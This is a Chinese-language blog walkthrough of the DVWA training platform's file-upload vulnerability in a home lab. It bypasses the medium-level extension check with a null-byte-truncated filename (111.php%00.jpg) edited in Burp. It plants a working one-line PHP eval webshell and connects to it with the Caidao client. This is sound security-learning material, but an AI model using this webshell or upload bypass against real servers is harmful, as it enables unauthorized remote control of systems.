DVWA文件上传漏洞
2018/4/6 criedcat
***本文需要知道%00截断是怎么个一回事。整体上的思路无非就是上传一个隐藏的木马,然后用菜刀链接***
****网络有文章说,%00截断出现在php5.3.4之前版本,但是我的测试环境是5.4.45,却依然可以用%00截断;笔者不知道是否和服务器有什么关系*****
首先介绍一下,dvwa是我们平常很熟悉的一个php漏洞集成平台。笔者常用来学习的开源平台就是BWAPP,DVWA,DEDECMS。在这篇文章中笔者将会讲到如何在DVWA这上面进行文件上传木马。level为中,高。
首先进行环境介绍,虚拟机win2003,装有phpstudy;真实机,win10最新版(昨天才更新),用火狐浏览器。
首先,我的虚拟机开启了“仅主机”模式。
如图,真实机中VMnet1网关192.168.135.1,子网掩码:255.255.255.0;
所以,经过虚拟机网络编辑器的调整后,虚拟机的ip调为192.168.135.128.此时两个系统可以正常通信。
-------------------------------------------------后台设置------------------------------------------------------------------
dvwa比较特殊,因为它纯粹是客户端就能进行后台的设置。比如level的高中低。以下的行为虽然发生在客户端的我进行的设置,但是我依然把以下的行为归类为后台设置。
http://192.168.135.128/dvwa/login.php
我们访问上述URL,
登入,在下图左侧点击左侧“文件上传”
在安全级别为low的情况下,我们可以直接上传一个php木马就行(dvwa对上传的大小有限制,我们上传的文件最好不要超过70KB)
但是,这未免太简单了。笔者将会在level=mideum的环境下上传木马,然后用菜刀链接。
在下图我将安全级别设置为了中。
-------------------------------------------------------------------入侵---------------------------------------------------
很好,我们设置完了作为后台的虚拟机的一切。
接下来,我们开始入侵。
我们登入上图,接下来就是想办法上传php的木马。
笔者将本人的美照贡献了出来。
先将jpg写成php,看看能否上传。
左上角有结果。
然后笔者试试能不能上传空白文本,后缀.jpg
上传成功。(其实我想看到他失败,因为很多情况下,这样上传必须加gif890才能成功)
看来服务器只检测后缀名是否是.jpg了,而不检测文件的内容。
(如果检测内容,需要在文件前面写gif890,如果扫描木马,需要二进制或者copy命令写木马;)
在这里,我直接用菜刀把服务端代码<?php @eval($_POST['caidao']);?>放到jpg文件中,然后把文件名改为111.php%00.jpg
把burp开启,抓包,
把下半部分的filename的值,那个%00,解除url编码(%00是URL编码,本身是截断的意思,我们解码后,就相当于越过了浏览器,直接在应用层下截断了后面的.jpg),然后放包。
然后,
根据路径提示,到那个上传的php文件中。
http://192.168.135.128/dvwa/hackable/uploads/111.php
把这个复制到菜刀,进行php链接,密码caidao写进去
我们进入了服务器。
至此,笔者对dvwa的文件上传漏洞先写在这里。